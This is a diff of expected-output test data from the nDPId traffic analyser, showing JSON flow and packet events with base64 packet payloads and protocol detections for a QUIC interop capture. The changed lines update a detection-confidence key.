00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434640,"flow_last_seen":1603816434640,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434640,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":45250,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1603816434640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434640,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAXZdAAEAReS3AqAGAM55pYrDCEVEE7CF4zAoKCgoI\/WffY03wSeUAAETSMHofJsIVRtpuQGVddBW97CfvMNh6FstJkOMpUt\/yyfMol2NH\/cmw9076\/GVp8Jiw6RRO55nAlaDXRKDx+fRRFB3MWLmB\/9BdlA7rKSF+bxrlmvb7IG3rx2evLnOEA295WB7h7yye\/Yb8SM1ckobonKrZZ3VSIcOyeDvx1To8yKU8S+qgO5UB6V6j3ZR4z8tia9hoRBaJuuWjnRXPIzRC\/Y4Ty4G0TTfbVLamm4ej+5tVGNr3TS7pN2Xzt9lr5OogvAmipVfcrFQmzNA\/+bixOvtJICDh3fR9sII+Aa6F3m95yiDF8HdhXx8TxWV640MZkTOca5MbcwS+YPz+INAIjF0s2owurg4clHkrQ\/h1vY9wfL8cau+doFTFKxQWkVu3t2i\/+mAsWEv1COMBJgtwWY\/1oMYnha9PWceb7bjtXvQ0AFrjBC2iUpE8uKG2lpMj3vw++EDHs4D8UOswAsYKSR3QKTNy5\/n9F2K6wbOe4lbPp1tEUC9i4BjrP65N5Jjd4whCLlWExxdcuUiqmeRWX1rLfPxynJrkw7vqaREC00sCdzi7Lh2rgh1ZgrEUMSznXgMtkuiWXjnmdl6yNUvpIov2oxF5IIqE7+inmRUO\/4bFKluz0rJxSvweOGUOG06qc89\/fVfEYvQVfSGie\/2jaZPAoa73lw60ChYZL5W8YQTUE+iYwCEs\/LrU43Io05inp4fW99XL+dqJLeBaKkadyRCr+ZlWnxdK3SIVAKssrqk8c+dwBP8Ga9TvI0fwtqyE9zLeGdLLth+UrgzbKZkjPtZvumQptE3y8vzXm3rNGckk+s+tH5kfuTErhMMgcEqqghapUSbghSKFnvd8KXrp5I5dImNV23VsAFnZphiNdSMrAO\/5tN9cHTB5kZFEzKzu5mIwtp39YSpIVho1618W4woojYayBTAYGdCFJnsdHAOWZ0YNc9fXqn3t7pH0RfvXqhkQ14VLJ65JuJqy\/Qz9StzBGBZch\/xsRQnL8tGwRc9QlrXGc3QWq7muqAOCyzpHoMChq2oTRE\/8HPgudmPNkrAf\/ScwBASioyMRhmPXbQOnz8kpZqhiLFLzbv+SqaBxgR+bgVYn1+3zxEWz0OQ7t81FdQLiQ\/r7o1w\/5GTxaT2UQy4+HSu3XgrEmc70xQDowI3TS6l1xbMtq6G0wpiqDxghwCsLBT2Jp0llaTYvV20z5T8ax80YSjv99Judp7QAD+5ZWDqxTHKL7rG3JmR6R8uIhzq4m21IYTygNOeNDTZrVPa3NY1BluNOiJM0ojQMwAtKPXhJSECktSWYBn4OIxP0YP6tXleYVmyb\/7bsrgrloCmarQYyCzGzZUopQB5p32ofLV7NTKVj48TfiOfWu7G7+u2kMk6czrGQwjYr399xRe06yg2sy+HVyEgd6XGMtNrXxL3I24LS63NRpc2fVvxrjZFP5bKendh2XIq59I5JF37M+rn6izwnuj0OrSHOnrx4VNLacB+DNwcXJTwF6fVCp5WfoIclvXXgD5bQwPAiNcduRQACIAJ6RQmeAmxrOjgDcNXfvMKHilUpISNlFeHOjhQMA+MiaVzNspXJLCod8B953YO\/H92LBu4hBpcVIl5YP489aYAYtVAU\/QpiEmGNr0vZKsef4Zb9RxDNgQgxIA=="} -00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434640,"flow_last_seen":1603816434640,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434640,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":45250,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434640,"flow_last_seen":1603816434640,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434640,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":45250,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434641,"flow_last_seen":1603816434641,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434641,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":42456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1603816434641,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434641,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAJ7VAAEAR9yjAqAGAhfLO9KXYAbsE7ImgzgoKCgoI+QsGqtFYjA8AAETSVUSb8KmUst+PHHzqT2SeL\/P07nKCp3USUYX2DxY7ve1fmgM+d6G2XMZ3HCv4lyQmqoBHOLElyJxOdKbHXGRlPb8Uw+yalWHgIS2xYoZgj5sMn8MqFHMsZqNCggoXKshRMixX78IzGLR2\/lKiD1A4mWU8YHeWKPR7TnPFWL0DkYoQdkBU3xXWNJeqWETA9YozB6efhg2cH2ogJnonWpHROpBEB6lu\/jcG\/MvvNGSQjaR7z3v7jq8Mw3XxsqjwZfgpi304y1BIMudGRSpwPxm1jggsFOOXDIKWUaaGiA8X1EtpSPbruNIaK\/L8nYCzR9\/1l92Fw0JngzKyN6xNFLLYtOKoV1Pwa0efysfY2dAAzQNo7LPVtGghy0jghB\/MURPiryuRJr7wLMN4\/xkziyibDmu9JuazbAVT5UQo01\/BC8SQIa5x6yjASIJd2bcftTT20FM1jxDiA3ArSF1FxI0DGP+Jup6uykp66yBe41NxzaF3JQhi3TYG05c9pWzR4rpiqKPbw8ISxSbEYLfqoBX7ZUxcl+Qs7EKjfeI5rSefpJ79UTAq2IOiRgmJMMPilU+j\/185uZ3gWFqXxY4lgvGRDb5sAaglqlZSnbVW0el8W0GPbw+\/aZQWJkNyosBG0ozqSDnxIVCgg0DqM7BVwbstGqm3b9mynQaPfUAvtCmsTRJuCzcgqkIiUtIZwgZHsP4Be4bN3A3Q2DeS1HWXmwRv5KaOe44h9q+4TtSXNmmmmTGGXWu2YAX7Lgvd0URyUOZt4f1KhTFK\/k8sK43+MB6mD4td8sjJsQiy0V30FZY3CtSNXK7u4R6vEWsgJPI55D4UDnEYK2uN8lk+fDHWtQbSlQqu0U4znKSeK2EAX9xBVuEJeh5HeX4+cNWyIRDmAoYsQmQgmHBoD6pedxp9SXnK9s\/7uoVpaKxNV9ZM\/iWMB\/uKFhDd1+o1EWWjwuWds0vy+ZbywiOwrY6ffiSgerdtWkuaQf7H9QdZ0UjwbnJvPjya7DyyPtvP8PWp\/N1D867R\/QvkR8ZIaOdSzOuUYBF\/bpCqsIrnKeR9VUtP9FyxkgG\/D6+0uEUl1c779cxCQck2S\/t2diwFSth\/DmYwuknya3f6okawJcF12dISBsiADyiScw4IixWhDn\/\/uIv78yc9e+mYJhjZyPxGXEyGiSruZ8bPrtfTna0\/r1NWY3ZypYWBjkDiSvD3Zfa1+eJsREXjUDRwmFnIeE1AgD9eHr4oXUc9yJ0M0cy1rxfrdBrPiv\/e9MTJXnRIvBev2VujEE1pdbaj\/uNoH8Iud1E4wh4YfsafTjdd+pK20QBXt1fVDPye\/nA\/auW82P\/6KerEyR8YFb1Q5decEBub3RIeRj1Zngb5dOSVgZS4YCk2C7bsuJFE8JSiO5eFBdWQrY9tTmedksZFAA6HhJPngNaUeVLzpnQktjQ5caPa6W7\/wHdT3eGdJpDXMcegGharvIfBkRc9tQPIVXwcqIbyrB3nyDdj71w60xBtjcgnuLW+j+IpTtj+MDyKaFGpdmJ95nu62ZA4gWFibO+sNt5rW4Ayr9RTU1vnb545kUJfXX39XayUfvMOvDTraKzQ3G7U4a0GC+KFmI9u9t3VltkEq5ickl9h+mNSdzqETNFgrEr943KdW+amAA=="} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434641,"flow_last_seen":1603816434641,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434641,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":42456,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434641,"flow_last_seen":1603816434641,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434641,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":42456,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434642,"flow_last_seen":1603816434642,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434642,"l3_proto":"ip6","src_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1603816434642,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434642,"pkt":"PKn0qB\/spJGxgjQ5ht1gBmesBNg6MCABSAB4FwEBvnZO\/\/4EYx0gAQsHCsnVrqTT\/kdpHoB9AQRbQQAAAABgAK6QBNgRMCABCwcKydWupNP+R2kegH0gAUgAeBcBAb52Tv\/+BGMdhooBuwTYZF3MCgoKCgiLyuadTBhpMAAARL5Jn8vg\/A\/iHcc5HGyjUHtzYCYh3M+1HzdHtSjFxotnADrnTs2cVW9HALnbbxq+j13Bpa3hTOGyFKAuVKKOVbHcGaJLdNA06DSFzV66GiVnWQJ+1MFEeQ+EHU1tYSy5DynacUlvf1G20dd2kmKE70+xxOTQI+IxdCf39TGHKu+pGUdVYYzStvwWo5npAklpjTRW1hPHPgr+vxfK0tzntAB4tgdSsfnM003avASiWDb+GIQGRqQqd12Z3S73M6xSxbEpPhQs03GVV7j7jPCY+xuSqdE0+RC2M2xTxkDxrKzwifOo5JzioGQ8n1leAaytkPPh7\/6kP3tXKc3zSh+6mDapIcrXvGRPBtxzjcwZlnfC61xJLZ4o\/bDf7VXUn2iqev2r7RfntxDJ4F+CHoqdQU19Agb1DRLZ+44sSsLJRZPe0rMYqmphZb9TR\/CXfZoxmWSMgVmNHVqPhkUDRkBFiFUg2qWtzD6IUIlCi4UB90+3QDAMKbHPStmRV90FoZ4qgb1QWQshIsAOJrfADpMoeQeOvpHnWSBMA4n5tbORKddl3SJHwqDMa\/kYlEza3HmYzKyIekgCLUxBLZMgtxwl0pUeJvIYxMdZF6Znn7pRsQ+GhZyet6ZCOM2ft7uJCMRH5bphpdavcWHTrSt8uZ2iyfo3VofxaZqdzUsHHTpc9bD205szhfCxENgNATF1PGuWlfKJUrPPjUWPpw65iGFR3+hPQ1+ZRRE7orDx2vkC5kOJiEvbv0d6sp6yfMo3tuOn4kXULD2rf5TSc8aqDVZCklaUIbEuKaQv0jni\/XkpmdOw2UlUp3oYLZ9on+kdq43Nf9WrEJ+gfSZPMUZsyhXXyPRNGMrTBo0SUX31QcOdzW7AQaAXnJRZob+0gus27voTqIEPJh01fxeGPbXNNQ7VzwarPIKHRq1lGIs\/wJwJCsm2hQjq0+K3VFq4cXacrOp5mbdbbDJRXEnCejUnTswq7Ga3dz818NNmVp7FoznVEcHX3RQBfk8eLveHtTEpxIgmvWuj5aaZt+HyxH\/0YALf+wz6lv1s1l\/hg9o2e11OlebH1k7T7awcxgi41AZepwsE50V3GVh5GwIfK89lz9Ro6tly3hUhrsJ2ja1C+A6RBrWVVdcIlZY4BlIcSzf0BUccadkfpP\/Enz0yFkuHTLXTyrmsvl44wgxOvsJrZMwFacqnccJZHwZHWEMkNcxcPbL0Z2U7a3Xa12dEVYYVu1U+X65oQyb2yPkBqMJ+DTB9RU+DnZIynnRzCZZkuvH7Uzn\/zVoVu3fNULVHSP4L+ehdOiOmS0l9r6IzvZQbe+xLjtz2iXbuU36zKNhA17n0gtw0JDOpoFDbD0FwhdY1JUMZx18mcrbFQX02CO02e+BE1Anxc\/TfBIKj2hI2ObT4d57WIvq7cpwJxNdZMuBfjVhAX64+5X4J\/pGNdD3WMTo1fYU74kzII9sWnijVE1WzVIBymOIxdGDOuxbCm5vJaE\/oIJEfaWcfmDwa+jhxCRN2aqJvKC+Iwq2cNN7z7vgOXAZ9SIrdZFgVX8+v9NO3ca9aZg=="} -00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434642,"flow_last_seen":1603816434642,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434642,"l3_proto":"ip6","src_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434642,"flow_last_seen":1603816434642,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434642,"l3_proto":"ip6","src_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":50289,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1603816434643,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434643,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAVf9AAEARrFLAqAGAR8opqcRxEVIE7K+PxgoKCgoIvbmHXcmpQ\/MAAETS3vbU8Sj6l2wQUfqZRc1xY7UZLfv8ZezreoQxaXMMFQplcHI2WGivL79HCn+gIsF8oZtTfotO31JT7vkJlhmOnm3lffZWDOZVO38TNr5VVART1r1V9c6QtCPl2rOLEXod3QmseC2zkUY1D5vxPNLpAyblFgLtoVLKMFRlexYKVyLMEaY69TsXwdxzuRMmPQ8UL6uRNnJiBB3upwv58iisAqq\/mRUYsFRLcP1OPYHQb5CZdE1Q\/A+91wfQFJGWqFUY9F+EFUVCV4bxdetx31E8OGGq+18vcHmg7G0LGgeINT+xkb92oyBcQkbST\/RWAy9hTbi4JTuezLjGIBdZzSMVzF4I6bcizx7siMmVUTnl3UmC\/rxQUcKk8XFu2YJs9y2Os4+WhVjMwJbIx\/bkcUSXo\/NnUnrT4jCwxD6nX7oTObYUuq8Cnz5uWFN6MRwb1OvukfRscRjrcumAQBklq8PagQJe6Oyy9xDjeo0pQi33fo\/c8Y2ccYq0oba\/ZjGmaTjWjw4fyRgR2xdNJWEfSX9rXqOdXmuGVEnT1hq2hHX+bWhy2QkCI7BHn0dcsep8lx89ym717WWE\/Xbpk0tFl\/pCnOGrBuniD5HFSZDdjSGLJoEXvoHbpOgi\/IJCVo50+AcmmA1BKQpFl8EapwyTEeKmc\/teOj7E7tI\/aOzLNeX8EUS3z24mYkZTFOR32Oujeu3clt1f1qtieJ4Tya9ptPHxYnje1QnGDP7dwz5gh676z5hDQGO4+4bo6ul6N0iIcXDo+Yt7zeunYaItRqPosZXZf2RDRVFhaPMyZpD37kbwM3I2xJNOsJXPxB4VObi0enWqgsSeRLY928BMaf67KliYniVAoxk2r104WSZUE7jxtTguYe4EME09Q5d6rrjnTfQPYIelchCLjz7IISF0G4QSth+iInqIg43sXwXNGEiA5n2ll+d4YEisZf5kJw7z7z4H8LHdJs0yPLtOkDemSyBDayKCguo3SC6thZsf4fL8MHcNaDnsBOQ3qsjckq3DPrhBaaQQ\/PnOQb0Pep8XXsjDPf1z6oYyQ5OmCTSiiICzO3jhCvp6VkuawZ63dTmMdwG07DNkuUzrCU1s3uXcU3hD432hU+A1bUo4tC\/eVs7\/Cg1UBIH4KQAD55x1zc1rsEiqb1C7faMv3OYy2TY2rHCzIrLKBxU59Q7kRtUbmutTo74p7kwrrlSTJCO1YNPtU6XBWtj7wzz81NndAWB6N0QAk8std4i2V6WuY2cGSRu66EYGTh\/8K91k4tTDBWpfGf4TNDSp5t5T0dGpvXA5zPG8DWjbXuVi7ELoqM51NEc8d7+IK2OCAdmYpX1PsoZL0Lbaw475Ho+KFWuruhhhwa7wzva4K3thZxpZy0eBP044yQ0lANRgJ3bThJg8RPAeJgPvuqFcX20la91uDGheq8GjpqmA35Zc3CODLtZQpRoUd6coXnW9stWjWC7LAp2e921jv6NfJLWpnOIL3\/YvqFROrdJzbLYKnKNfCTryzQPuJNK60hRlQe0ccZ844JLUpRAYdtGzZkFKHhFRXy6oBkYx1M3HW\/UE2PcwS\/IjPcNZbTy+fdv2atp2T3sGZ4LPZca6tbu49as0q5fcEgS\/u25\/J8syzbevr8VL71PTWp8v54ud1Q=="} -00996{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":50289,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00996{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":50289,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434643,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":49270,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1603816434643,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434643,"pkt":"pJGxgjQ5PKn0qB\/sht1gDhbcBNgRQCABCwcKydWupNP+R2kegH0gAQvIR6QcJQAAAAAAAAABwHYRUgTYy97JCgoKCgizoUNUPmNvHgAARL7kE1\/vTL\/NMlU9dFfohroNb3lFa0sajkl+NYJsmpdZxseLTol2hdZqlkF1hqB0ifjTUijhcAiX+sblrKEYN3cCa28xTnru44DNDzMC4mlv4HrZOqLLNO\/UlY1sQ8NKCbNtoSq21p7clWer16m4TAw7H\/F9E3AX\/MdNlxeqaKJvymPkTEmiXkH2WePQ14zEX\/OsIv\/9nKZprtTphxJOpWh9iC60eXUS92cRfpPE4t2QsqYFBWlVb+13SoAgtAjkrTvvSLYg\/D9UbwBgPzj7R4p4Cd+bbadGFWvc8wcjuV9E+a+X5gFeHhOOh92iUHSpTT\/SzNsRBUS9i7htX+D9DZZfG6yrrqJwDVKCG3skrDDAnAOEIj5wc9E6ktIWj727nJPaG4F\/yFeB9mvF4BGMSF2t1HX1v3Uf8fd+2\/CrVkIpM1QnAbm2kykvcJlPK0VaRsZgQsar09\/xE1coUXATF0tDX6QEFU7xe84fN1PUk1FXFUXQjOBwq0tYTTcPCN4qGKSXtiP22FkC3\/OV2TW+6RsyY4afHoIc55iP9uTyiDz8GgsOMMcDAt86zjUpsGFleM3dlpIjA5SRInS88gDuKFXQazWcKMDZGgZ5OzzGPWiaCCElrFoU6Z0C9Z3M3gT5NV2VJc1gEss3QWIiObA5nJk+9Egjbcm3dvzdusN6QEHoBwehHTuwg2LVAOrhrdwgJHwD24nAbkGvZS6207+R+dDWgjErFMPgJjQk90HJrSxW3PVzyhqFF8r1HhvahtRcrGLHjwGBKNWw\/mrkVazrYWToNHELFQGA97zWhxG8ZSHR+27fKaBvWg5SNzSWU2wqAon3FV4zTetTXEb9zkLHsi2S8+hrVzPvDpUzxu5LCvszrotwPRcXWgIMpfFuHdDkZxnUc45aPM4oNaKzuB\/0K41UWRnLrJN6\/+98eIMaltlc4V06CpAS5gYRWr9oVtc+QkkWRldnz37SdoLKl8j4QpdxDKnGiBhtH2t7EGBZvilk2\/E0n1dYaPhlbDUz8OHPLZKVRSX+2OC6kXAYMmbeaPeYmlTGxdw7MpypCb0e78htplM7XmCygTm7xO55EtSdHoQEqVVTNOIIkzaRk0or7ix1b+Ac9bulavsll9eLerk9aXIedIpmtLAhpid4yPMzOfK14JMJmXBfXb5Bmo\/4e2X5MhFs1h6MDiN0sF8lsZJljJ9S5QgvPFUHTbEgZwtOqgzvOm6MsHiV4dCQU3zeds93rktywyH+Qpw1nOVbV0RHa72zd0Io5tIKuEbGJ4DvYBtvaNEL2GzNcfpg1SNHmTLW9FsceE8YJg9q1N4VFcd0DPFy5W443yNter3ub6Z+8DDshzGfLalC9+Gxtga2a8QCpuk8EpMk+hYjiHRQMcz0FVALld4YdzH4Q7aHFNufiFtsQORs2elcXiDr+suYZd\/KbghskPHXcWBEvZ87I+FVy0zTnkd6sN9nVlJxmggfsaoPYeNUdCjf4aj8XSdzugsx\/gjaDcmur3C2vSPf7TTH0vuXm+WJUiYbW8mepVZGo\/Ab4kEw9z6H9LiIvVjV2bJog+FgNpi+bCuPZrXaL1QVg16ASOkMyJEOBJ\/ApwZq1c+0SVVETGYjpibsmHYU2g=="} 